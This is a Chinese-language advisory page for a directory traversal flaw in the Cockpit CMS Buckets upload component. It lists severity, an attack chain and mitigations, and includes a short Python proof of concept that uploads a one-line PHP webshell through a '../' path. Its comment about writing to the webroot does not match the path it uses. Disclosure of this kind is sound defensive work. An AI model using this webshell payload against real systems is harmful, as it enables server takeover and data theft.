CVE-2026-38993 CVSS 6.5 中危

CVE-2026-38993 Cockpit目录遍历漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-38993

漏洞类型

目录遍历

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Cockpit CMS

漏洞概述

Cockpit CMS 2.13.5及更早版本中存在一个安全漏洞，该漏洞位于Buckets组件中。由于缺乏适当的输入验证，经过身份验证的攻击者可以利用目录遍历漏洞，将恶意文件写入上传目录内的任意位置，或者用恶意版本覆盖现有资源。此漏洞可能导致网站完整性受损，攻击者可利用此机制植入Webshell或篡改核心文件，从而进一步控制受影响的系统。建议管理员尽快检查并更新系统以防范潜在风险。

技术细节

该漏洞根源于Cockpit CMS的Buckets组件在处理文件上传或存储路径时，未能正确过滤用户提供的输入。具体而言，应用程序直接使用了未经过充分净化的文件名或路径参数，导致攻击者可以通过构造包含特殊序列（如“../”）的输入，跳出原本预期的上传目录限制。由于需要低权限认证，攻击者首先需要获得一个合法的账户。一旦获得访问权限，攻击者可以向Buckets接口发送特制的HTTP请求。利用该漏洞，攻击者能够遍历文件系统，将上传的文件保存至服务器指定的任意路径中。这不仅允许攻击者写入uploads目录外的文件，更严重的是，它允许覆盖系统现有的资源文件（如JavaScript、CSS或配置文件）。如果成功覆盖关键资产文件，攻击者可以在用户访问页面时执行恶意脚本，或者通过上传可执行脚本进一步获得服务器权限，造成严重的数据泄露或系统完全沦陷。

攻击链分析

STEP 1

侦察与访问

攻击者发现目标运行Cockpit CMS，并获取一个低权限的合法账户凭证。

STEP 2

漏洞利用

攻击者构造包含目录遍历字符（如../）的恶意文件名，向Buckets组件的接口发送上传请求。

STEP 3

文件写入

由于验证缺失，应用程序将文件写入到攻击者指定的任意位置，或覆盖系统现有的关键资产文件。

STEP 4

权限提升与控制

攻击者访问被写入的恶意文件或被篡改的资源，从而在服务器上执行恶意代码或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target.com/api/buckets/upload"

# Attacker's session cookie (authenticated user)
cookies = {
    "cockpit": "session_token_here"
}

# Malicious file content
files = {
    'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
}

# Payload exploiting directory traversal to write to webroot
data = {
    'path': '../../../tmp/uploads/shell.php' # Or path to overwrite an asset
}

response = requests.post(url, files=files, data=data, cookies=cookies)

if response.status_code == 200:
    print("[+] Exploit successful! File written.")
else:
    print("[-] Exploit failed.")

影响范围

Cockpit CMS <= 2.13.5

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用Buckets组件或限制对上传接口的访问。同时，检查服务器uploads目录及核心资产文件是否已被篡改，并清理可疑文件。加强对用户账户的权限管理，确保仅受信任用户具有上传权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表